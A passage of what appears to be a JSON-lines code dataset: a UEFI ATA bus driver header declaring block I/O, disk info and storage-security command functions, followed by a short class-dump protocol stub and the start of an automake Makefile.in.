an I/O abstraction to the driver.\r\n @param[in] RemainingDevicePath A pointer to the remaining portion of a device path. This\r\n parameter is ignored by device drivers, and is optional for bus\r\n drivers. For bus drivers, if this parameter is not NULL, then\r\n the bus driver must determine if the bus controller specified\r\n by ControllerHandle and the child controller specified\r\n by RemainingDevicePath are both supported by this\r\n bus driver.\r\n\r\n @retval EFI_SUCCESS The device specified by ControllerHandle and\r\n RemainingDevicePath is supported by the driver specified by This.\r\n @retval EFI_ALREADY_STARTED The device specified by ControllerHandle and\r\n RemainingDevicePath is already being managed by the driver\r\n specified by This.\r\n @retval EFI_ACCESS_DENIED The device specified by ControllerHandle and\r\n RemainingDevicePath is already being managed by a different\r\n driver or an application that requires exclusive access.\r\n Currently not implemented.\r\n @retval EFI_UNSUPPORTED The device specified by ControllerHandle and\r\n RemainingDevicePath is not supported by the driver specified by This.\r\n**/\r\nEFI_STATUS\r\nEFIAPI\r\nAtaBusDriverBindingSupported (\r\n IN EFI_DRIVER_BINDING_PROTOCOL *This,\r\n IN EFI_HANDLE Controller,\r\n IN EFI_DEVICE_PATH_PROTOCOL *RemainingDevicePath\r\n );\r\n\r\n/**\r\n Starts a device controller or a bus controller.\r\n\r\n The Start() function is designed to be invoked from the EFI boot service ConnectController().\r\n As a result, much of the error checking on the parameters to Start() has been moved into this\r\n common boot service. It is legal to call Start() from other locations,\r\n but the following calling restrictions must be followed or the system behavior will not be deterministic.\r\n 1. ControllerHandle must be a valid EFI_HANDLE.\r\n 2. If RemainingDevicePath is not NULL, then it must be a pointer to a naturally aligned\r\n EFI_DEVICE_PATH_PROTOCOL.\r\n 3. Prior to calling Start(), the Supported() function for the driver specified by This must\r\n have been called with the same calling parameters, and Supported() must have returned EFI_SUCCESS.\r\n\r\n @param[in] This A pointer to the EFI_DRIVER_BINDING_PROTOCOL instance.\r\n @param[in] ControllerHandle The handle of the controller to start. This handle\r\n must support a protocol interface that supplies\r\n an I/O abstraction to the driver.\r\n @param[in] RemainingDevicePath A pointer to the remaining portion of a device path. This\r\n parameter is ignored by device drivers, and is optional for bus\r\n drivers. For a bus driver, if this parameter is NULL, then handles\r\n for all the children of Controller are created by this driver.\r\n If this parameter is not NULL and the first Device Path Node is\r\n not the End of Device Path Node, then only the handle for the\r\n child device specified by the first Device Path Node of\r\n RemainingDevicePath is created by this driver.\r\n If the first Device Path Node of RemainingDevicePath is\r\n the End of Device Path Node, no child handle is created by this\r\n driver.\r\n\r\n @retval EFI_SUCCESS The device was started.\r\n @retval EFI_DEVICE_ERROR The device could not be started due to a device error.Currently not implemented.\r\n @retval EFI_OUT_OF_RESOURCES The request could not be completed due to a lack of resources.\r\n @retval Others The driver failded to start the device.\r\n\r\n**/\r\nEFI_STATUS\r\nEFIAPI\r\nAtaBusDriverBindingStart (\r\n IN EFI_DRIVER_BINDING_PROTOCOL *This,\r\n IN EFI_HANDLE Controller,\r\n IN EFI_DEVICE_PATH_PROTOCOL *RemainingDevicePath\r\n );\r\n\r\n/**\r\n Stops a device controller or a bus controller.\r\n\r\n The Stop() function is designed to be invoked from the EFI boot service DisconnectController().\r\n As a result, much of the error checking on the parameters to Stop() has been moved\r\n into this common boot service. It is legal to call Stop() from other locations,\r\n but the following calling restrictions must be followed or the system behavior will not be deterministic.\r\n 1. ControllerHandle must be a valid EFI_HANDLE that was used on a previous call to this\r\n same driver's Start() function.\r\n 2. The first NumberOfChildren handles of ChildHandleBuffer must all be a valid\r\n EFI_HANDLE. In addition, all of these handles must have been created in this driver's\r\n Start() function, and the Start() function must have called OpenProtocol() on\r\n ControllerHandle with an Attribute of EFI_OPEN_PROTOCOL_BY_CHILD_CONTROLLER.\r\n\r\n @param[in] This A pointer to the EFI_DRIVER_BINDING_PROTOCOL instance.\r\n @param[in] ControllerHandle A handle to the device being stopped. The handle must\r\n support a bus specific I/O protocol for the driver\r\n to use to stop the device.\r\n @param[in] NumberOfChildren The number of child device handles in ChildHandleBuffer.\r\n @param[in] ChildHandleBuffer An array of child handles to be freed. May be NULL\r\n if NumberOfChildren is 0.\r\n\r\n @retval EFI_SUCCESS The device was stopped.\r\n @retval EFI_DEVICE_ERROR The device could not be stopped due to a device error.\r\n\r\n**/\r\nEFI_STATUS\r\nEFIAPI\r\nAtaBusDriverBindingStop (\r\n IN EFI_DRIVER_BINDING_PROTOCOL *This,\r\n IN EFI_HANDLE Controller,\r\n IN UINTN NumberOfChildren,\r\n IN EFI_HANDLE *ChildHandleBuffer\r\n );\r\n\r\n\r\n/**\r\n Retrieves a Unicode string that is the user readable name of the driver.\r\n\r\n This function retrieves the user readable name of a driver in the form of a\r\n Unicode string. If the driver specified by This has a user readable name in\r\n the language specified by Language, then a pointer to the driver name is\r\n returned in DriverName, and EFI_SUCCESS is returned. If the driver specified\r\n by This does not support the language specified by Language,\r\n then EFI_UNSUPPORTED is returned.\r\n\r\n @param This[in] A pointer to the EFI_COMPONENT_NAME2_PROTOCOL or\r\n EFI_COMPONENT_NAME_PROTOCOL instance.\r\n\r\n @param Language[in] A pointer to a Null-terminated ASCII string\r\n array indicating the language. This is the\r\n language of the driver name that the caller is\r\n requesting, and it must match one of the\r\n languages specified in SupportedLanguages. The\r\n number of languages supported by a driver is up\r\n to the driver writer. Language is specified\r\n in RFC 4646 or ISO 639-2 language code format.\r\n\r\n @param DriverName[out] A pointer to the Unicode string to return.\r\n This Unicode string is the name of the\r\n driver specified by This in the language\r\n specified by Language.\r\n\r\n @retval EFI_SUCCESS The Unicode string for the Driver specified by\r\n This and the language specified by Language was\r\n returned in DriverName.\r\n\r\n @retval EFI_INVALID_PARAMETER Language is NULL.\r\n\r\n @retval EFI_INVALID_PARAMETER DriverName is NULL.\r\n\r\n @retval EFI_UNSUPPORTED The driver specified by This does not support\r\n the language specified by Language.\r\n\r\n**/\r\nEFI_STATUS\r\nEFIAPI\r\nAtaBusComponentNameGetDriverName (\r\n IN EFI_COMPONENT_NAME_PROTOCOL *This,\r\n IN CHAR8 *Language,\r\n OUT CHAR16 **DriverName\r\n );\r\n\r\n\r\n/**\r\n Retrieves a Unicode string that is the user readable name of the controller\r\n that is being managed by a driver.\r\n\r\n This function retrieves the user readable name of the controller specified by\r\n ControllerHandle and ChildHandle in the form of a Unicode string. If the\r\n driver specified by This has a user readable name in the language specified by\r\n Language, then a pointer to the controller name is returned in ControllerName,\r\n and EFI_SUCCESS is returned. If the driver specified by This is not currently\r\n managing the controller specified by ControllerHandle and ChildHandle,\r\n then EFI_UNSUPPORTED is returned. If the driver specified by This does not\r\n support the language specified by Language, then EFI_UNSUPPORTED is returned.\r\n\r\n @param This[in] A pointer to the EFI_COMPONENT_NAME2_PROTOCOL or\r\n EFI_COMPONENT_NAME_PROTOCOL instance.\r\n\r\n @param ControllerHandle[in] The handle of a controller that the driver\r\n specified by This is managing. This handle\r\n specifies the controller whose name is to be\r\n returned.\r\n\r\n @param ChildHandle[in] The handle of the child controller to retrieve\r\n the name of. This is an optional parameter that\r\n may be NULL. It will be NULL for device\r\n drivers. It will also be NULL for a bus drivers\r\n that wish to retrieve the name of the bus\r\n controller. It will not be NULL for a bus\r\n driver that wishes to retrieve the name of a\r\n child controller.\r\n\r\n @param Language[in] A pointer to a Null-terminated ASCII string\r\n array indicating the language. This is the\r\n language of the driver name that the caller is\r\n requesting, and it must match one of the\r\n languages specified in SupportedLanguages. The\r\n number of languages supported by a driver is up\r\n to the driver writer. Language is specified in\r\n RFC 4646 or ISO 639-2 language code format.\r\n\r\n @param ControllerName[out] A pointer to the Unicode string to return.\r\n This Unicode string is the name of the\r\n controller specified by ControllerHandle and\r\n ChildHandle in the language specified by\r\n Language from the point of view of the driver\r\n specified by This.\r\n\r\n @retval EFI_SUCCESS The Unicode string for the user readable name in\r\n the language specified by Language for the\r\n driver specified by This was returned in\r\n DriverName.\r\n\r\n @retval EFI_INVALID_PARAMETER ControllerHandle is NULL.\r\n\r\n @retval EFI_INVALID_PARAMETER ChildHandle is not NULL and it is not a valid\r\n EFI_HANDLE.\r\n\r\n @retval EFI_INVALID_PARAMETER Language is NULL.\r\n\r\n @retval EFI_INVALID_PARAMETER ControllerName is NULL.\r\n\r\n @retval EFI_UNSUPPORTED The driver specified by This is not currently\r\n managing the controller specified by\r\n ControllerHandle and ChildHandle.\r\n\r\n @retval EFI_UNSUPPORTED The driver specified by This does not support\r\n the language specified by Language.\r\n\r\n**/\r\nEFI_STATUS\r\nEFIAPI\r\nAtaBusComponentNameGetControllerName (\r\n IN EFI_COMPONENT_NAME_PROTOCOL *This,\r\n IN EFI_HANDLE ControllerHandle,\r\n IN EFI_HANDLE ChildHandle OPTIONAL,\r\n IN CHAR8 *Language,\r\n OUT CHAR16 **ControllerName\r\n );\r\n\r\n\r\n/**\r\n Reset the Block Device.\r\n\r\n @param This Indicates a pointer to the calling context.\r\n @param ExtendedVerification Driver may perform diagnostics on reset.\r\n\r\n @retval EFI_SUCCESS The device was reset.\r\n @retval EFI_DEVICE_ERROR The device is not functioning properly and could\r\n not be reset.\r\n\r\n**/\r\nEFI_STATUS\r\nEFIAPI\r\nAtaBlockIoReset (\r\n IN EFI_BLOCK_IO_PROTOCOL *This,\r\n IN BOOLEAN ExtendedVerification\r\n );\r\n\r\n\r\n/**\r\n Read BufferSize bytes from Lba into Buffer.\r\n\r\n @param This Indicates a pointer to the calling context.\r\n @param MediaId Id of the media, changes every time the media is replaced.\r\n @param Lba The starting Logical Block Address to read from\r\n @param BufferSize Size of Buffer, must be a multiple of device block size.\r\n @param Buffer A pointer to the destination buffer for the data. The caller is\r\n responsible for either having implicit or explicit ownership of the buffer.\r\n\r\n @retval EFI_SUCCESS The data was read correctly from the device.\r\n @retval EFI_DEVICE_ERROR The device reported an error while performing the read.\r\n @retval EFI_NO_MEDIA There is no media in the device.\r\n @retval EFI_MEDIA_CHANGED The MediaId does not matched the current device.\r\n @retval EFI_BAD_BUFFER_SIZE The Buffer was not a multiple of the block size of the device.\r\n @retval EFI_INVALID_PARAMETER The read request contains LBAs that are not valid,\r\n or the buffer is not on proper alignment.\r\n\r\n**/\r\nEFI_STATUS\r\nEFIAPI\r\nAtaBlockIoReadBlocks (\r\n IN EFI_BLOCK_IO_PROTOCOL *This,\r\n IN UINT32 MediaId,\r\n IN EFI_LBA Lba,\r\n IN UINTN BufferSize,\r\n OUT VOID *Buffer\r\n );\r\n\r\n\r\n/**\r\n Write BufferSize bytes from Lba into Buffer.\r\n\r\n @param This Indicates a pointer to the calling context.\r\n @param MediaId The media ID that the write request is for.\r\n @param Lba The starting logical block address to be written. The caller is\r\n responsible for writing to only legitimate locations.\r\n @param BufferSize Size of Buffer, must be a multiple of device block size.\r\n @param Buffer A pointer to the source buffer for the data.\r\n\r\n @retval EFI_SUCCESS The data was written correctly to the device.\r\n @retval EFI_WRITE_PROTECTED The device can not be written to.\r\n @retval EFI_DEVICE_ERROR The device reported an error while performing the write.\r\n @retval EFI_NO_MEDIA There is no media in the device.\r\n @retval EFI_MEDIA_CHNAGED The MediaId does not matched the current device.\r\n @retval EFI_BAD_BUFFER_SIZE The Buffer was not a multiple of the block size of the device.\r\n @retval EFI_INVALID_PARAMETER The write request contains LBAs that are not valid,\r\n or the buffer is not on proper alignment.\r\n\r\n**/\r\nEFI_STATUS\r\nEFIAPI\r\nAtaBlockIoWriteBlocks (\r\n IN EFI_BLOCK_IO_PROTOCOL *This,\r\n IN UINT32 MediaId,\r\n IN EFI_LBA Lba,\r\n IN UINTN BufferSize,\r\n IN VOID *Buffer\r\n );\r\n\r\n\r\n/**\r\n Flush the Block Device.\r\n\r\n @param This Indicates a pointer to the calling context.\r\n\r\n @retval EFI_SUCCESS All outstanding data was written to the device\r\n @retval EFI_DEVICE_ERROR The device reported an error while writing back the data\r\n @retval EFI_NO_MEDIA There is no media in the device.\r\n\r\n**/\r\nEFI_STATUS\r\nEFIAPI\r\nAtaBlockIoFlushBlocks (\r\n IN EFI_BLOCK_IO_PROTOCOL *This\r\n );\r\n\r\n/**\r\n Reset the Block Device throught Block I/O2 protocol.\r\n\r\n @param[in] This Indicates a pointer to the calling context.\r\n @param[in] ExtendedVerification Driver may perform diagnostics on reset.\r\n\r\n @retval EFI_SUCCESS The device was reset.\r\n @retval EFI_DEVICE_ERROR The device is not functioning properly and could\r\n not be reset.\r\n\r\n**/\r\nEFI_STATUS\r\nEFIAPI\r\nAtaBlockIoResetEx (\r\n IN EFI_BLOCK_IO2_PROTOCOL *This,\r\n IN BOOLEAN ExtendedVerification\r\n );\r\n\r\n/**\r\n Read BufferSize bytes from Lba into Buffer.\r\n\r\n @param[in] This Indicates a pointer to the calling context.\r\n @param[in] MediaId Id of the media, changes every time the media is replaced.\r\n @param[in] Lba The starting Logical Block Address to read from.\r\n @param[in, out] Token A pointer to the token associated with the transaction.\r\n @param[in] BufferSize Size of Buffer, must be a multiple of device block size.\r\n @param[out] Buffer A pointer to the destination buffer for the data. The caller is\r\n responsible for either having implicit or explicit ownership of the buffer.\r\n\r\n @retval EFI_SUCCESS The read request was queued if Event is not NULL.\r\n The data was read correctly from the device if\r\n the Event is NULL.\r\n @retval EFI_DEVICE_ERROR The device reported an error while performing\r\n the read.\r\n @retval EFI_NO_MEDIA There is no media in the device.\r\n @retval EFI_MEDIA_CHANGED The MediaId is not for the current media.\r\n @retval EFI_BAD_BUFFER_SIZE The BufferSize parameter is not a multiple of the\r\n intrinsic block size of the device.\r\n @retval EFI_INVALID_PARAMETER The read request contains LBAs that are not valid,\r\n or the buffer is not on proper alignment.\r\n @retval EFI_OUT_OF_RESOURCES The request could not be completed due to a lack\r\n of resources.\r\n\r\n**/\r\nEFI_STATUS\r\nEFIAPI\r\nAtaBlockIoReadBlocksEx (\r\n IN EFI_BLOCK_IO2_PROTOCOL *This,\r\n IN UINT32 MediaId,\r\n IN EFI_LBA Lba,\r\n IN OUT EFI_BLOCK_IO2_TOKEN *Token,\r\n IN UINTN BufferSize,\r\n OUT VOID *Buffer\r\n );\r\n\r\n/**\r\n Write BufferSize bytes from Lba into Buffer.\r\n\r\n @param[in] This Indicates a pointer to the calling context.\r\n @param[in] MediaId The media ID that the write request is for.\r\n @param[in] Lba The starting logical block address to be written. The\r\n caller is responsible for writing to only legitimate\r\n locations.\r\n @param[in, out] Token A pointer to the token associated with the transaction.\r\n @param[in] BufferSize Size of Buffer, must be a multiple of device block size.\r\n @param[in] Buffer A pointer to the source buffer for the data.\r\n\r\n @retval EFI_SUCCESS The data was written correctly to the device.\r\n @retval EFI_WRITE_PROTECTED The device can not be written to.\r\n @retval EFI_DEVICE_ERROR The device reported an error while performing the write.\r\n @retval EFI_NO_MEDIA There is no media in the device.\r\n @retval EFI_MEDIA_CHNAGED The MediaId does not matched the current device.\r\n @retval EFI_BAD_BUFFER_SIZE The Buffer was not a multiple of the block size of the device.\r\n @retval EFI_INVALID_PARAMETER The write request contains LBAs that are not valid,\r\n or the buffer is not on proper alignment.\r\n\r\n**/\r\nEFI_STATUS\r\nEFIAPI\r\nAtaBlockIoWriteBlocksEx (\r\n IN EFI_BLOCK_IO2_PROTOCOL *This,\r\n IN UINT32 MediaId,\r\n IN EFI_LBA Lba,\r\n IN OUT EFI_BLOCK_IO2_TOKEN *Token,\r\n IN UINTN BufferSize,\r\n IN VOID *Buffer\r\n );\r\n\r\n/**\r\n Flush the Block Device.\r\n\r\n @param[in] This Indicates a pointer to the calling context.\r\n @param[in, out] Token A pointer to the token associated with the transaction.\r\n\r\n @retval EFI_SUCCESS All outstanding data was written to the device\r\n @retval EFI_DEVICE_ERROR The device reported an error while writing back the data\r\n @retval EFI_NO_MEDIA There is no media in the device.\r\n\r\n**/\r\nEFI_STATUS\r\nEFIAPI\r\nAtaBlockIoFlushBlocksEx (\r\n IN EFI_BLOCK_IO2_PROTOCOL *This,\r\n IN OUT EFI_BLOCK_IO2_TOKEN *Token\r\n );\r\n\r\n/**\r\n Terminate any in-flight non-blocking I/O requests by signaling an EFI_ABORTED\r\n in the TransactionStatus member of the EFI_BLOCK_IO2_TOKEN for the non-blocking\r\n I/O. After that it is safe to free any Token or Buffer data structures that\r\n were allocated to initiate the non-blockingI/O requests that were in-flight for\r\n this device.\r\n\r\n @param[in] AtaDevice The ATA child device involved for the operation.\r\n\r\n**/\r\nVOID\r\nEFIAPI\r\nAtaTerminateNonBlockingTask (\r\n IN ATA_DEVICE *AtaDevice\r\n );\r\n\r\n/**\r\n Provides inquiry information for the controller type.\r\n\r\n This function is used by the IDE bus driver to get inquiry data. Data format\r\n of Identify data is defined by the Interface GUID.\r\n\r\n @param[in] This Pointer to the EFI_DISK_INFO_PROTOCOL instance.\r\n @param[in, out] InquiryData Pointer to a buffer for the inquiry data.\r\n @param[in, out] InquiryDataSize Pointer to the value for the inquiry data size.\r\n\r\n @retval EFI_SUCCESS The command was accepted without any errors.\r\n @retval EFI_NOT_FOUND Device does not support this data class\r\n @retval EFI_DEVICE_ERROR Error reading InquiryData from device\r\n @retval EFI_BUFFER_TOO_SMALL InquiryDataSize not big enough\r\n\r\n**/\r\nEFI_STATUS\r\nEFIAPI\r\nAtaDiskInfoInquiry (\r\n IN EFI_DISK_INFO_PROTOCOL *This,\r\n IN OUT VOID *InquiryData,\r\n IN OUT UINT32 *InquiryDataSize\r\n );\r\n\r\n\r\n/**\r\n Provides identify information for the controller type.\r\n\r\n This function is used by the IDE bus driver to get identify data. Data format\r\n of Identify data is defined by the Interface GUID.\r\n\r\n @param[in] This Pointer to the EFI_DISK_INFO_PROTOCOL\r\n instance.\r\n @param[in, out] IdentifyData Pointer to a buffer for the identify data.\r\n @param[in, out] IdentifyDataSize Pointer to the value for the identify data\r\n size.\r\n\r\n @retval EFI_SUCCESS The command was accepted without any errors.\r\n @retval EFI_NOT_FOUND Device does not support this data class\r\n @retval EFI_DEVICE_ERROR Error reading IdentifyData from device\r\n @retval EFI_BUFFER_TOO_SMALL IdentifyDataSize not big enough\r\n\r\n**/\r\nEFI_STATUS\r\nEFIAPI\r\nAtaDiskInfoIdentify (\r\n IN EFI_DISK_INFO_PROTOCOL *This,\r\n IN OUT VOID *IdentifyData,\r\n IN OUT UINT32 *IdentifyDataSize\r\n );\r\n\r\n\r\n/**\r\n Provides sense data information for the controller type.\r\n\r\n This function is used by the IDE bus driver to get sense data.\r\n Data format of Sense data is defined by the Interface GUID.\r\n\r\n @param[in] This Pointer to the EFI_DISK_INFO_PROTOCOL instance.\r\n @param[in, out] SenseData Pointer to the SenseData.\r\n @param[in, out] SenseDataSize Size of SenseData in bytes.\r\n @param[out] SenseDataNumber Pointer to the value for the sense data size.\r\n\r\n @retval EFI_SUCCESS The command was accepted without any errors.\r\n @retval EFI_NOT_FOUND Device does not support this data class.\r\n @retval EFI_DEVICE_ERROR Error reading SenseData from device.\r\n @retval EFI_BUFFER_TOO_SMALL SenseDataSize not big enough.\r\n\r\n**/\r\nEFI_STATUS\r\nEFIAPI\r\nAtaDiskInfoSenseData (\r\n IN EFI_DISK_INFO_PROTOCOL *This,\r\n IN OUT VOID *SenseData,\r\n IN OUT UINT32 *SenseDataSize,\r\n OUT UINT8 *SenseDataNumber\r\n );\r\n\r\n\r\n/**\r\n This function is used by the IDE bus driver to get controller information.\r\n\r\n @param[in] This Pointer to the EFI_DISK_INFO_PROTOCOL instance.\r\n @param[out] IdeChannel Pointer to the Ide Channel number. Primary or secondary.\r\n @param[out] IdeDevice Pointer to the Ide Device number. Master or slave.\r\n\r\n @retval EFI_SUCCESS IdeChannel and IdeDevice are valid.\r\n @retval EFI_UNSUPPORTED This is not an IDE device.\r\n\r\n**/\r\nEFI_STATUS\r\nEFIAPI\r\nAtaDiskInfoWhichIde (\r\n IN EFI_DISK_INFO_PROTOCOL *This,\r\n OUT UINT32 *IdeChannel,\r\n OUT UINT32 *IdeDevice\r\n );\r\n\r\n/**\r\n Send a security protocol command to a device that receives data and/or the result\r\n of one or more commands sent by SendData.\r\n\r\n The ReceiveData function sends a security protocol command to the given MediaId.\r\n The security protocol command sent is defined by SecurityProtocolId and contains\r\n the security protocol specific data SecurityProtocolSpecificData. The function\r\n returns the data from the security protocol command in PayloadBuffer.\r\n\r\n For devices supporting the SCSI command set, the security protocol command is sent\r\n using the SECURITY PROTOCOL IN command defined in SPC-4.\r\n\r\n For devices supporting the ATA command set, the security protocol command is sent\r\n using one of the TRUSTED RECEIVE commands defined in ATA8-ACS if PayloadBufferSize\r\n is non-zero.\r\n\r\n If the PayloadBufferSize is zero, the security protocol command is sent using the\r\n Trusted Non-Data command defined in ATA8-ACS.\r\n\r\n If PayloadBufferSize is too small to store the available data from the security\r\n protocol command, the function shall copy PayloadBufferSize bytes into the\r\n PayloadBuffer and return EFI_WARN_BUFFER_TOO_SMALL.\r\n\r\n If PayloadBuffer or PayloadTransferSize is NULL and PayloadBufferSize is non-zero,\r\n the function shall return EFI_INVALID_PARAMETER.\r\n\r\n If the given MediaId does not support security protocol commands, the function shall\r\n return EFI_UNSUPPORTED. If there is no media in the device, the function returns\r\n EFI_NO_MEDIA. If the MediaId is not the ID for the current media in the device,\r\n the function returns EFI_MEDIA_CHANGED.\r\n\r\n If the security protocol fails to complete within the Timeout period, the function\r\n shall return EFI_TIMEOUT.\r\n\r\n If the security protocol command completes without an error, the function shall\r\n return EFI_SUCCESS. If the security protocol command completes with an error, the\r\n function shall return EFI_DEVICE_ERROR.\r\n\r\n @param This Indicates a pointer to the calling context.\r\n @param MediaId ID of the medium to receive data from.\r\n @param Timeout The timeout, in 100ns units, to use for the execution\r\n of the security protocol command. A Timeout value of 0\r\n means that this function will wait indefinitely for the\r\n security protocol command to execute. If Timeout is greater\r\n than zero, then this function will return EFI_TIMEOUT\r\n if the time required to execute the receive data command\r\n is greater than Timeout.\r\n @param SecurityProtocolId The value of the \"Security Protocol\" parameter of\r\n the security protocol command to be sent.\r\n @param SecurityProtocolSpecificData The value of the \"Security Protocol Specific\" parameter\r\n of the security protocol command to be sent.\r\n @param PayloadBufferSize Size in bytes of the payload data buffer.\r\n @param PayloadBuffer A pointer to a destination buffer to store the security\r\n protocol command specific payload data for the security\r\n protocol command. The caller is responsible for having\r\n either implicit or explicit ownership of the buffer.\r\n @param PayloadTransferSize A pointer to a buffer to store the size in bytes of the\r\n data written to the payload data buffer.\r\n\r\n @retval EFI_SUCCESS The security protocol command completed successfully.\r\n @retval EFI_WARN_BUFFER_TOO_SMALL The PayloadBufferSize was too small to store the available\r\n data from the device. The PayloadBuffer contains the truncated data.\r\n @retval EFI_UNSUPPORTED The given MediaId does not support security protocol commands.\r\n @retval EFI_DEVICE_ERROR The security protocol command completed with an error.\r\n @retval EFI_NO_MEDIA There is no media in the device.\r\n @retval EFI_MEDIA_CHANGED The MediaId is not for the current media.\r\n @retval EFI_INVALID_PARAMETER The PayloadBuffer or PayloadTransferSize is NULL and\r\n PayloadBufferSize is non-zero.\r\n @retval EFI_TIMEOUT A timeout occurred while waiting for the security\r\n protocol command to execute.\r\n\r\n**/\r\nEFI_STATUS\r\nEFIAPI\r\nAtaStorageSecurityReceiveData (\r\n IN EFI_STORAGE_SECURITY_COMMAND_PROTOCOL *This,\r\n IN UINT32 MediaId,\r\n IN UINT64 Timeout,\r\n IN UINT8 SecurityProtocolId,\r\n IN UINT16 SecurityProtocolSpecificData,\r\n IN UINTN PayloadBufferSize,\r\n OUT VOID *PayloadBuffer,\r\n OUT UINTN *PayloadTransferSize\r\n );\r\n\r\n/**\r\n Send a security protocol command to a device.\r\n\r\n The SendData function sends a security protocol command containing the payload\r\n PayloadBuffer to the given MediaId. The security protocol command sent is\r\n defined by SecurityProtocolId and contains the security protocol specific data\r\n SecurityProtocolSpecificData. If the underlying protocol command requires a\r\n specific padding for the command payload, the SendData function shall add padding\r\n bytes to the command payload to satisfy the padding requirements.\r\n\r\n For devices supporting the SCSI command set, the security protocol command is sent\r\n using the SECURITY PROTOCOL OUT command defined in SPC-4.\r\n\r\n For devices supporting the ATA command set, the security protocol command is sent\r\n using one of the TRUSTED SEND commands defined in ATA8-ACS if PayloadBufferSize\r\n is non-zero. If the PayloadBufferSize is zero, the security protocol command is\r\n sent using the Trusted Non-Data command defined in ATA8-ACS.\r\n\r\n If PayloadBuffer is NULL and PayloadBufferSize is non-zero, the function shall\r\n return EFI_INVALID_PARAMETER.\r\n\r\n If the given MediaId does not support security protocol commands, the function\r\n shall return EFI_UNSUPPORTED. If there is no media in the device, the function\r\n returns EFI_NO_MEDIA. If the MediaId is not the ID for the current media in the\r\n device, the function returns EFI_MEDIA_CHANGED.\r\n\r\n If the security protocol fails to complete within the Timeout period, the function\r\n shall return EFI_TIMEOUT.\r\n\r\n If the security protocol command completes without an error, the function shall return\r\n EFI_SUCCESS. If the security protocol command completes with an error, the function\r\n shall return EFI_DEVICE_ERROR.\r\n\r\n @param This Indicates a pointer to the calling context.\r\n @param MediaId ID of the medium to receive data from.\r\n @param Timeout The timeout, in 100ns units, to use for the execution\r\n of the security protocol command. A Timeout value of 0\r\n means that this function will wait indefinitely for the\r\n security protocol command to execute. If Timeout is greater\r\n than zero, then this function will return EFI_TIMEOUT\r\n if the time required to execute the receive data command\r\n is greater than Timeout.\r\n @param SecurityProtocolId The value of the \"Security Protocol\" parameter of\r\n the security protocol command to be sent.\r\n @param SecurityProtocolSpecificData The value of the \"Security Protocol Specific\" parameter\r\n of the security protocol command to be sent.\r\n @param PayloadBufferSize Size in bytes of the payload data buffer.\r\n @param PayloadBuffer A pointer to a destination buffer to store the security\r\n protocol command specific payload data for the security\r\n protocol command.\r\n\r\n @retval EFI_SUCCESS The security protocol command completed successfully.\r\n @retval EFI_UNSUPPORTED The given MediaId does not support security protocol commands.\r\n @retval EFI_DEVICE_ERROR The security protocol command completed with an error.\r\n @retval EFI_NO_MEDIA There is no media in the device.\r\n @retval EFI_MEDIA_CHANGED The MediaId is not for the current media.\r\n @retval EFI_INVALID_PARAMETER The PayloadBuffer is NULL and PayloadBufferSize is non-zero.\r\n @retval EFI_TIMEOUT A timeout occurred while waiting for the security\r\n protocol command to execute.\r\n\r\n**/\r\nEFI_STATUS\r\nEFIAPI\r\nAtaStorageSecuritySendData (\r\n IN EFI_STORAGE_SECURITY_COMMAND_PROTOCOL *This,\r\n IN UINT32 MediaId,\r\n IN UINT64 Timeout,\r\n IN UINT8 SecurityProtocolId,\r\n IN UINT16 SecurityProtocolSpecificData,\r\n IN UINTN PayloadBufferSize,\r\n IN VOID *PayloadBuffer\r\n );\r\n\r\n/**\r\n Send TPer Reset command to reset eDrive to lock all protected bands.\r\n Typically, there are 2 mechanism for resetting eDrive. They are:\r\n 1. TPer Reset through IEEE 1667 protocol.\r\n 2. TPer Reset through native TCG protocol.\r\n This routine will detect what protocol the attached eDrive comform to, TCG or\r\n IEEE 1667 protocol. Then send out TPer Reset command separately.\r\n\r\n @param[in] AtaDevice ATA_DEVICE pointer.\r\n\r\n**/\r\nVOID\r\nInitiateTPerReset (\r\n IN ATA_DEVICE *AtaDevice\r\n );\r\n\r\n#endif\r\n"} {"text": "//\n// Generated by class-dump 3.5 (64 bit) (Debug version compiled Oct 15 2018 10:31:50).\n//\n// class-dump is Copyright (C) 1997-1998, 2000-2001, 2004-2015 by Steve Nygard.\n//\n\n#import \n\n@protocol CKRecordValue \n@end\n\n"} {"text": "# Makefile.in generated by automake 1.8.4 from Makefile.am.\n# @configure_input@\n\n# Copyright (C) 1994, 1995, 1996, 1997, 1998, 1999, 2000, 2001, 2002,\n# 2003, 2004 Free Software Foundation, Inc.\n# This Makefile.in is free software; the Free Software Foundation\n# gives unlimited permission to copy and/or distribute it,\n# with or without modifications, as long as this notice is preserved.\n\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY, to the extent permitted by law; without\n# even the implied warranty of MERCHANTABILITY or FITNESS FOR A\n# PARTICULAR PURPOSE.\n\n@SET_MAKE@\n\nsrcdir = @srcdir@\ntop_srcdir = @top_srcdir@\nVPATH = @srcdir@\npkgdatadir = $(datadir)/@PACKAGE@\npkglibdir = $(libdir)/@PACKAGE@\npkgincludedir = $(includedir)/@PACKAGE@\ntop_builddir = ..\nam__cd = CDPATH=\"$${ZSH_VERSION+.}$(PATH_SEPARATOR)\" && cd\nINSTALL = @INSTALL@\ninstall_sh_DATA = $(install_sh) -c -m 644\ninstall_sh_PROGRAM = $(install_sh) -c\ninstall_sh_SCRIPT = $(install_sh) -c\nINSTALL_HEADER = $(INSTALL_DATA)\ntransform = $(program_transform_name)\nNORMAL_INSTALL = :\nPRE_INSTALL = :\nPOST_INSTALL = :\nNORMAL_UNINSTALL = :\nPRE_UNINSTALL = :\nPOST_UNINSTALL = :\nhost_triplet = @host@\nsubdir = include\nDIST_COMMON = $(libini_include_HEADERS) $(srcdir)/Makefile.am \\\n\t$(srcdir)/Makefile.in $(srcdir)/config.h.in\nACLOCAL_M4 = $(top_srcdir)/aclocal.m4\nam__aclocal_m4_deps = $(top_srcdir)/configure.in\nam__configure_deps = $(am__aclocal_m4_deps) $(CONFIGURE_DEPENDENCIES) \\\n\t$(ACLOCAL_M4)\nmkinstalldirs = $(SHELL) $(top_srcdir)/unix/mkinstalldirs\nCONFIG_HEADER = config.h\nCONFIG_CLEAN_FILES =\nSOURCES =\nDIST_SOURCES =\nam__installdirs = \"$(DESTDIR)$(libini_includedir)\"\nlibini_includeHEADERS_INSTALL = $(INSTALL_HEADER)\nHEADERS = $(libini_include_HEADERS)\nETAGS = etags\nCTAGS = ctags\nDISTFILES = $(DIST_COMMON) $(DIST_SOURCES) $(TEXINFOS) $(EXTRA_DIST)\nACLOCAL = @ACLOCAL@\nAMDEP_FALSE = @AMDEP_FALSE@\nAMDEP_TRUE = @AMDEP_TRUE@\nAMTAR = @AMTAR@\nAR = @AR@\nAS = 